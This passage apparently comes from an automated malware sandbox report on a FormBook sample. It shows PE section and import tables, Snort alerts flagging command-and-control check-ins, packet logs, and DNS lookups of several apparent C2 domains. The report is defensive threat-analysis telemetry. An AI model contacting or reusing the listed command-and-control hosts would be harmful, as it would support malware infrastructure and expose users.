                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG        | 0x0             | 0x0          |
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT    | 0x0             | 0x0          |
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR    | 0x0             | 0x0          |
                                                                  IMAGE_DIRECTORY_ENTRY_TLS          | 0x0             | 0x0          |
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG  | 0x0             | 0x0          |
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0             | 0x0          |
                                                                  IMAGE_DIRECTORY_ENTRY_IAT          | 0x5000          | 0xf8         | .rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0             | 0x0          |
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0           | 0x0          |
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED     | 0x0             | 0x0          |

                                                                  Sections

                                                                  Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy       | Characteristics
                                                                  .text  | 0x1000          | 0x341c       | 0x3600   | False    | 0.580005787037  | data      | 6.26349761527 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rdata | 0x5000          | 0x964        | 0xa00    | False    | 0.44921875      | data      | 5.07425103063 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data  | 0x6000          | 0x698        | 0x400    | False    | 0.2001953125    | data      | 1.23908157506 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                                                  Imports

                                                                  DLL | Import
                                                                  USER32.dll | GrayStringW, GetDC
                                                                  SHLWAPI.dll | StrCmpNIA, StrToIntA, PathBuildRootA, UrlCompareA, StrCmpNA, UrlCanonicalizeA
                                                                  WINSPOOL.DRV | AddJobA, GetPrinterW, DeviceCapabilitiesW, OpenPrinterA
                                                                  WS2_32.dll | bind, recv, WSACleanup, getprotobyname
                                                                  KERNEL32.dll | GetEnvironmentStrings, LoadLibraryA, GetProcAddress, HeapReAlloc, VirtualAlloc, HeapAlloc, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, GetModuleFileNameA, WriteFile, RtlUnwind, HeapFree, VirtualFree, HeapCreate, HeapDestroy, GetLastError, TlsGetValue, GetModuleHandleA, GetStartupInfoW, GetVersion, ExitProcess, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, GetModuleFileNameW, FreeEnvironmentStringsA, MultiByteToWideChar, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetCurrentThreadId, TlsSetValue, TlsAlloc, SetLastError

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  Timestamp                | Protocol | SID     | Message                                       | Source Port | Dest Port | Source IP      | Dest IP
                                                                  07/22/21-17:43:18.792527 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET)          | 49748       | 80        | 192.168.2.6    | 34.102.136.180
                                                                  07/22/21-17:43:18.792527 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET)          | 49748       | 80        | 192.168.2.6    | 34.102.136.180
                                                                  07/22/21-17:43:18.792527 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET)          | 49748       | 80        | 192.168.2.6    | 34.102.136.180
                                                                  07/22/21-17:43:18.931600 | TCP      | 1201    | ATTACK-RESPONSES 403 Forbidden                | 80          | 49748     | 34.102.136.180 | 192.168.2.6
                                                                  07/22/21-17:43:31.750777 | ICMP     | 402     | ICMP Destination Unreachable Port Unreachable |             |           | 192.168.2.6    | 8.8.8.8
                                                                  07/22/21-17:43:36.803444 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET)          | 49753       | 80        | 192.168.2.6    | 52.58.78.16
                                                                  07/22/21-17:43:36.803444 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET)          | 49753       | 80        | 192.168.2.6    | 52.58.78.16
                                                                  07/22/21-17:43:36.803444 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET)          | 49753       | 80        | 192.168.2.6    | 52.58.78.16
                                                                  07/22/21-17:43:47.172087 | TCP      | 1201    | ATTACK-RESPONSES 403 Forbidden                | 80          | 49758     | 34.102.136.180 | 192.168.2.6
                                                                  07/22/21-17:44:09.256104 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET)          | 49762       | 80        | 192.168.2.6    | 103.138.88.11
                                                                  07/22/21-17:44:09.256104 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET)          | 49762       | 80        | 192.168.2.6    | 103.138.88.11
                                                                  07/22/21-17:44:09.256104 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET)          | 49762       | 80        | 192.168.2.6    | 103.138.88.11
                                                                  07/22/21-17:44:14.927140 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET)          | 49763       | 80        | 192.168.2.6    | 162.241.62.54
                                                                  07/22/21-17:44:14.927140 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET)          | 49763       | 80        | 192.168.2.6    | 162.241.62.54
                                                                  07/22/21-17:44:14.927140 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET)          | 49763       | 80        | 192.168.2.6    | 162.241.62.54

                                                                  Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 17:43:11.343118906 CEST | 49734 | 80 | 192.168.2.6 | 154.88.31.204
Jul 22, 2021 17:43:11.575372934 CEST | 80 | 49734 | 154.88.31.204 | 192.168.2.6
Jul 22, 2021 17:43:12.136018038 CEST | 49734 | 80 | 192.168.2.6 | 154.88.31.204
Jul 22, 2021 17:43:12.368423939 CEST | 80 | 49734 | 154.88.31.204 | 192.168.2.6
Jul 22, 2021 17:43:13.014456034 CEST | 49734 | 80 | 192.168.2.6 | 154.88.31.204
Jul 22, 2021 17:43:13.246651888 CEST | 80 | 49734 | 154.88.31.204 | 192.168.2.6
Jul 22, 2021 17:43:14.653124094 CEST | 49740 | 80 | 192.168.2.6 | 154.88.31.204
Jul 22, 2021 17:43:14.882957935 CEST | 80 | 49740 | 154.88.31.204 | 192.168.2.6
Jul 22, 2021 17:43:15.526932955 CEST | 49740 | 80 | 192.168.2.6 | 154.88.31.204
Jul 22, 2021 17:43:15.758316040 CEST | 80 | 49740 | 154.88.31.204 | 192.168.2.6
Jul 22, 2021 17:43:16.326723099 CEST | 49740 | 80 | 192.168.2.6 | 154.88.31.204
Jul 22, 2021 17:43:16.556637049 CEST | 80 | 49740 | 154.88.31.204 | 192.168.2.6
Jul 22, 2021 17:43:18.749845028 CEST | 49748 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:18.792249918 CEST | 80 | 49748 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:18.792349100 CEST | 49748 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:18.792526960 CEST | 49748 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:18.834424019 CEST | 80 | 49748 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:18.931600094 CEST | 80 | 49748 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:18.931624889 CEST | 80 | 49748 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:18.931854963 CEST | 49748 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:18.931946039 CEST | 49748 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:18.973994970 CEST | 80 | 49748 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:24.088432074 CEST | 49752 | 80 | 192.168.2.6 | 169.62.77.158
Jul 22, 2021 17:43:24.280039072 CEST | 80 | 49752 | 169.62.77.158 | 192.168.2.6
Jul 22, 2021 17:43:24.283181906 CEST | 49752 | 80 | 192.168.2.6 | 169.62.77.158
Jul 22, 2021 17:43:24.283298969 CEST | 49752 | 80 | 192.168.2.6 | 169.62.77.158
Jul 22, 2021 17:43:24.473177910 CEST | 80 | 49752 | 169.62.77.158 | 192.168.2.6
Jul 22, 2021 17:43:24.475476027 CEST | 80 | 49752 | 169.62.77.158 | 192.168.2.6
Jul 22, 2021 17:43:24.475632906 CEST | 80 | 49752 | 169.62.77.158 | 192.168.2.6
Jul 22, 2021 17:43:24.475788116 CEST | 49752 | 80 | 192.168.2.6 | 169.62.77.158
Jul 22, 2021 17:43:24.475841045 CEST | 49752 | 80 | 192.168.2.6 | 169.62.77.158
Jul 22, 2021 17:43:24.666521072 CEST | 80 | 49752 | 169.62.77.158 | 192.168.2.6
Jul 22, 2021 17:43:36.760740042 CEST | 49753 | 80 | 192.168.2.6 | 52.58.78.16
Jul 22, 2021 17:43:36.802845001 CEST | 80 | 49753 | 52.58.78.16 | 192.168.2.6
Jul 22, 2021 17:43:36.803149939 CEST | 49753 | 80 | 192.168.2.6 | 52.58.78.16
Jul 22, 2021 17:43:36.803443909 CEST | 49753 | 80 | 192.168.2.6 | 52.58.78.16
Jul 22, 2021 17:43:36.847222090 CEST | 80 | 49753 | 52.58.78.16 | 192.168.2.6
Jul 22, 2021 17:43:36.847250938 CEST | 80 | 49753 | 52.58.78.16 | 192.168.2.6
Jul 22, 2021 17:43:36.847265005 CEST | 80 | 49753 | 52.58.78.16 | 192.168.2.6
Jul 22, 2021 17:43:36.847419977 CEST | 49753 | 80 | 192.168.2.6 | 52.58.78.16
Jul 22, 2021 17:43:36.847469091 CEST | 49753 | 80 | 192.168.2.6 | 52.58.78.16
Jul 22, 2021 17:43:36.889657021 CEST | 80 | 49753 | 52.58.78.16 | 192.168.2.6
Jul 22, 2021 17:43:46.990670919 CEST | 49758 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:47.033973932 CEST | 80 | 49758 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:47.034095049 CEST | 49758 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:47.034261942 CEST | 49758 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:47.077419043 CEST | 80 | 49758 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:47.172086954 CEST | 80 | 49758 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:47.172107935 CEST | 80 | 49758 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:47.172236919 CEST | 49758 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:47.172348976 CEST | 49758 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:47.214202881 CEST | 80 | 49758 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:57.808830023 CEST | 49760 | 80 | 192.168.2.6 | 119.59.120.26
Jul 22, 2021 17:43:58.053662062 CEST | 80 | 49760 | 119.59.120.26 | 192.168.2.6
Jul 22, 2021 17:43:58.053909063 CEST | 49760 | 80 | 192.168.2.6 | 119.59.120.26
Jul 22, 2021 17:43:58.054111004 CEST | 49760 | 80 | 192.168.2.6 | 119.59.120.26
Jul 22, 2021 17:43:58.297991991 CEST | 80 | 49760 | 119.59.120.26 | 192.168.2.6
Jul 22, 2021 17:43:58.298029900 CEST | 80 | 49760 | 119.59.120.26 | 192.168.2.6
Jul 22, 2021 17:43:58.298044920 CEST | 80 | 49760 | 119.59.120.26 | 192.168.2.6
Jul 22, 2021 17:43:58.298280001 CEST | 49760 | 80 | 192.168.2.6 | 119.59.120.26
Jul 22, 2021 17:43:58.298341036 CEST | 49760 | 80 | 192.168.2.6 | 119.59.120.26
Jul 22, 2021 17:43:58.542184114 CEST | 80 | 49760 | 119.59.120.26 | 192.168.2.6
Jul 22, 2021 17:44:03.474526882 CEST | 49761 | 80 | 192.168.2.6 | 62.149.128.40
Jul 22, 2021 17:44:03.542164087 CEST | 80 | 49761 | 62.149.128.40 | 192.168.2.6
Jul 22, 2021 17:44:03.542320967 CEST | 49761 | 80 | 192.168.2.6 | 62.149.128.40
Jul 22, 2021 17:44:03.542511940 CEST | 49761 | 80 | 192.168.2.6 | 62.149.128.40
Jul 22, 2021 17:44:03.612077951 CEST | 80 | 49761 | 62.149.128.40 | 192.168.2.6
Jul 22, 2021 17:44:03.612123013 CEST | 80 | 49761 | 62.149.128.40 | 192.168.2.6
Jul 22, 2021 17:44:03.612144947 CEST | 80 | 49761 | 62.149.128.40 | 192.168.2.6
Jul 22, 2021 17:44:03.612165928 CEST | 80 | 49761 | 62.149.128.40 | 192.168.2.6
Jul 22, 2021 17:44:03.612847090 CEST | 49761 | 80 | 192.168.2.6 | 62.149.128.40
Jul 22, 2021 17:44:03.612873077 CEST | 49761 | 80 | 192.168.2.6 | 62.149.128.40
Jul 22, 2021 17:44:03.692063093 CEST | 80 | 49761 | 62.149.128.40 | 192.168.2.6
Jul 22, 2021 17:44:08.996076107 CEST | 49762 | 80 | 192.168.2.6 | 103.138.88.11
Jul 22, 2021 17:44:09.255644083 CEST | 80 | 49762 | 103.138.88.11 | 192.168.2.6
Jul 22, 2021 17:44:09.255965948 CEST | 49762 | 80 | 192.168.2.6 | 103.138.88.11
Jul 22, 2021 17:44:09.256103992 CEST | 49762 | 80 | 192.168.2.6 | 103.138.88.11
Jul 22, 2021 17:44:09.551270008 CEST | 80 | 49762 | 103.138.88.11 | 192.168.2.6
Jul 22, 2021 17:44:09.556632996 CEST | 80 | 49762 | 103.138.88.11 | 192.168.2.6
Jul 22, 2021 17:44:09.556662083 CEST | 80 | 49762 | 103.138.88.11 | 192.168.2.6
Jul 22, 2021 17:44:09.556957006 CEST | 49762 | 80 | 192.168.2.6 | 103.138.88.11
Jul 22, 2021 17:44:09.556978941 CEST | 49762 | 80 | 192.168.2.6 | 103.138.88.11
Jul 22, 2021 17:44:09.871092081 CEST | 80 | 49762 | 103.138.88.11 | 192.168.2.6
Jul 22, 2021 17:44:14.757420063 CEST | 49763 | 80 | 192.168.2.6 | 162.241.62.54
Jul 22, 2021 17:44:14.926631927 CEST | 80 | 49763 | 162.241.62.54 | 192.168.2.6
Jul 22, 2021 17:44:14.926965952 CEST | 49763 | 80 | 192.168.2.6 | 162.241.62.54
Jul 22, 2021 17:44:14.927139997 CEST | 49763 | 80 | 192.168.2.6 | 162.241.62.54
Jul 22, 2021 17:44:15.094000101 CEST | 80 | 49763 | 162.241.62.54 | 192.168.2.6
Jul 22, 2021 17:44:15.440208912 CEST | 49763 | 80 | 192.168.2.6 | 162.241.62.54
Jul 22, 2021 17:44:15.647013903 CEST | 80 | 49763 | 162.241.62.54 | 192.168.2.6
Jul 22, 2021 17:44:15.720453024 CEST | 80 | 49763 | 162.241.62.54 | 192.168.2.6
Jul 22, 2021 17:44:15.720489979 CEST | 80 | 49763 | 162.241.62.54 | 192.168.2.6
Jul 22, 2021 17:44:15.720509052 CEST | 80 | 49763 | 162.241.62.54 | 192.168.2.6
Jul 22, 2021 17:44:15.720535994 CEST | 49763 | 80 | 192.168.2.6 | 162.241.62.54
Jul 22, 2021 17:44:15.720561028 CEST | 49763 | 80 | 192.168.2.6 | 162.241.62.54
Jul 22, 2021 17:44:15.720598936 CEST | 49763 | 80 | 192.168.2.6 | 162.241.62.54
Jul 22, 2021 17:44:15.730438948 CEST | 80 | 49763 | 162.241.62.54 | 192.168.2.6
Jul 22, 2021 17:44:15.730526924 CEST | 49763 | 80 | 192.168.2.6 | 162.241.62.54
Jul 22, 2021 17:44:15.730544090 CEST | 80 | 49763 | 162.241.62.54 | 192.168.2.6
Jul 22, 2021 17:44:15.730595112 CEST | 49763 | 80 | 192.168.2.6 | 162.241.62.54

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 17:42:03.511848927 CEST | 49448 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:03.569889069 CEST | 53 | 49448 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:04.450882912 CEST | 60342 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:04.500457048 CEST | 53 | 60342 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:05.441169024 CEST | 61346 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:05.491653919 CEST | 53 | 61346 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:06.618273020 CEST | 51774 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:06.677932024 CEST | 53 | 51774 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:06.793505907 CEST | 56023 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:06.852504969 CEST | 53 | 56023 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:08.337930918 CEST | 58384 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:08.397641897 CEST | 53 | 58384 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:09.781018019 CEST | 60261 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:09.830863953 CEST | 53 | 60261 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:10.985940933 CEST | 56061 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:11.043087959 CEST | 53 | 56061 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:12.190715075 CEST | 58336 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:12.243096113 CEST | 53 | 58336 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:13.402030945 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:13.451323032 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:14.271378994 CEST | 54064 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:14.330457926 CEST | 53 | 54064 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:15.578588963 CEST | 52811 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:15.636074066 CEST | 53 | 52811 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:16.940037966 CEST | 55299 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:16.990402937 CEST | 53 | 55299 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:18.087132931 CEST | 63745 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:18.137650013 CEST | 53 | 63745 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:19.463337898 CEST | 50055 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:19.515728951 CEST | 53 | 50055 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:20.275600910 CEST | 61374 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:20.325866938 CEST | 53 | 61374 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:21.392210960 CEST | 50339 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:21.450920105 CEST | 53 | 50339 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:23.156260014 CEST | 63307 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:23.216284990 CEST | 53 | 63307 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:39.544902086 CEST | 49694 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:39.607366085 CEST | 53 | 49694 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:57.953447104 CEST | 54982 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:58.013339043 CEST | 53 | 54982 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:59.305155993 CEST | 50010 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:59.362071991 CEST | 53 | 50010 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:10.196938038 CEST | 63718 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:10.256752968 CEST | 53 | 63718 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:11.126398087 CEST | 62116 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:11.301726103 CEST | 63816 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:11.337713003 CEST | 53 | 62116 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:11.413774014 CEST | 53 | 63816 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:12.377896070 CEST | 55014 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:12.434833050 CEST | 53 | 55014 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:12.910334110 CEST | 62208 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:12.985701084 CEST | 53 | 62208 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:13.392081022 CEST | 57574 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:13.452209949 CEST | 53 | 57574 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:14.429198027 CEST | 51818 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:14.528397083 CEST | 56628 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:14.586556911 CEST | 53 | 56628 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:14.637433052 CEST | 53 | 51818 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:15.729002953 CEST | 60778 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:15.786372900 CEST | 53 | 60778 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:16.234397888 CEST | 53799 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:16.294121981 CEST | 53 | 53799 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:16.988153934 CEST | 54683 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:17.037671089 CEST | 53 | 54683 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:18.265986919 CEST | 59329 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:18.327318907 CEST | 53 | 59329 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:19.089314938 CEST | 64021 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:19.146363020 CEST | 53 | 64021 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:21.120238066 CEST | 56129 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:21.179997921 CEST | 53 | 56129 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:22.011571884 CEST | 58177 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:22.072957039 CEST | 53 | 58177 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:23.938721895 CEST | 50700 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:24.086940050 CEST | 53 | 50700 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:29.505934000 CEST | 54069 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:30.544126987 CEST | 54069 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:31.544264078 CEST | 54069 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:31.679512024 CEST | 53 | 54069 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:31.749258995 CEST | 53 | 54069 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:32.341495037 CEST | 53 | 54069 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:36.693537951 CEST | 61178 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:36.758774996 CEST | 53 | 61178 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:40.869638920 CEST | 57017 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:40.941163063 CEST | 53 | 57017 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:44.985136032 CEST | 56327 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:45.052967072 CEST | 53 | 56327 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:46.928169966 CEST | 50243 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:46.989679098 CEST | 53 | 50243 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:47.187015057 CEST | 62055 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:47.252425909 CEST | 53 | 62055 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:52.184102058 CEST | 61249 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:52.401670933 CEST | 53 | 61249 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:57.417082071 CEST | 65252 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:57.807579994 CEST | 53 | 65252 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:44:03.409462929 CEST | 64367 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:44:03.471841097 CEST | 53 | 64367 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:44:08.630681038 CEST | 55066 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:44:08.993699074 CEST | 53 | 55066 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:44:14.569951057 CEST | 60211 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:44:14.755909920 CEST | 53 | 60211 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:44:20.458342075 CEST | 56570 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:44:20.523808956 CEST | 53 | 56570 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:44:25.974387884 CEST | 58454 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:44:26.063608885 CEST | 53 | 58454 | 8.8.8.8 | 192.168.2.6

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jul 22, 2021 17:43:31.750777006 CEST | 192.168.2.6 | 8.8.8.8 | cfff | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 22, 2021 17:43:11.126398087 CEST | 192.168.2.6 | 8.8.8.8 | 0x1866 | Standard query (0) | www.aizaibali.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:14.429198027 CEST | 192.168.2.6 | 8.8.8.8 | 0xd048 | Standard query (0) | www.aizaibali.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:18.265986919 CEST | 192.168.2.6 | 8.8.8.8 | 0x82af | Standard query (0) | www.extinctionbrews.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:23.938721895 CEST | 192.168.2.6 | 8.8.8.8 | 0x64c8 | Standard query (0) | www.doityourselfism.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:29.505934000 CEST | 192.168.2.6 | 8.8.8.8 | 0xac29 | Standard query (0) | www.xn--vuq722jwngjre.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:30.544126987 CEST | 192.168.2.6 | 8.8.8.8 | 0xac29 | Standard query (0) | www.xn--vuq722jwngjre.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:31.544264078 CEST | 192.168.2.6 | 8.8.8.8 | 0xac29 | Standard query (0) | www.xn--vuq722jwngjre.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:36.693537951 CEST | 192.168.2.6 | 8.8.8.8 | 0xe600 | Standard query (0) | www.ecofingers.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:46.928169966 CEST | 192.168.2.6 | 8.8.8.8 | 0xef2d | Standard query (0) | www.invisiongc.net | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:52.184102058 CEST | 192.168.2.6 | 8.8.8.8 | 0x3cef | Standard query (0) | www.oikoschain.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:57.417082071 CEST | 192.168.2.6 | 8.8.8.8 | 0xfbfc | Standard query (0) | www.findfoodshop.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:44:03.409462929 CEST | 192.168.2.6 | 8.8.8.8 | 0xa966 | Standard query (0) | www.scuolatua.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:44:08.630681038 CEST | 192.168.2.6 | 8.8.8.8 | 0x71e5 | Standard query (0) | www.okinawarongnho.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:44:14.569951057 CEST | 192.168.2.6 | 8.8.8.8 | 0xf647 | Standard query (0) | www.jorgeporcayo.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:44:20.458342075 CEST | 192.168.2.6 | 8.8.8.8 | 0x9ea4 | Standard query (0) | www.wthcoffee.com | A (IP address) | IN (0x0001)
